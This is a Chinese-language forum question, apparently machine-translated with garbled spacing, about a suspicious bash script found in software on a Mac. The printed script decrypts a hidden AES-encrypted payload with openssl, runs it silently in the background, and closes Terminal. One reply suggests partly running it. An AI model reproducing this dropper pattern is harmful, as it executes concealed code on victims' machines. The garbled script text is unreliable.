我安装了装有Catalina OS的Macbook Pro,并打开了一个朋友给我的软件。其中之一包含以下脚本:
#!/ bin / bashappDir = $(cd $ {dirname“ $ 0”); pwd -P)tmpDir =“ $(mktemp -d / tmp / XXXXXXXXXXXX)”binFile =“ $(cd” $ appDir“; ls | grep -Ev'。(command)$'| head -n 1 | rev)”archive =“ $(echo $ binFile | rev)”commandArgs = 'U2FsdGVkX19l + G / Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U / EdzrXoF / kIvQK3SAyxT + xoF1R3BTwwNPbz8x9XjUXBaoTf / q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh / 9xMk4tAYYruOSaCp / 087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo / 7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d / brUgZosug2A6'unlockedCommand =“ $(echo -e” $ commandArgs“ | openssl enc -aes-256-cbc -d -A -base64 -k” $ archive“)”commandArgs =“ $(eval echo -e” $ decryptedCommand“)”nohup / bin / bash -c“ $ commandArgs”> / dev / null 2>&1&killall终端
有人知道它在做什么,在做什么?
这是bash脚本。
如果您运行除最后两个之外的所有内容,您应该非常安全-并且可能能够看到它想要做什么。
不确定您是否已经知道/已注意到,但是命令部分已加密,因此真正知道发生了什么的唯一方法是使用此解密代码,也许Internet上的某些解密器软件可以帮助您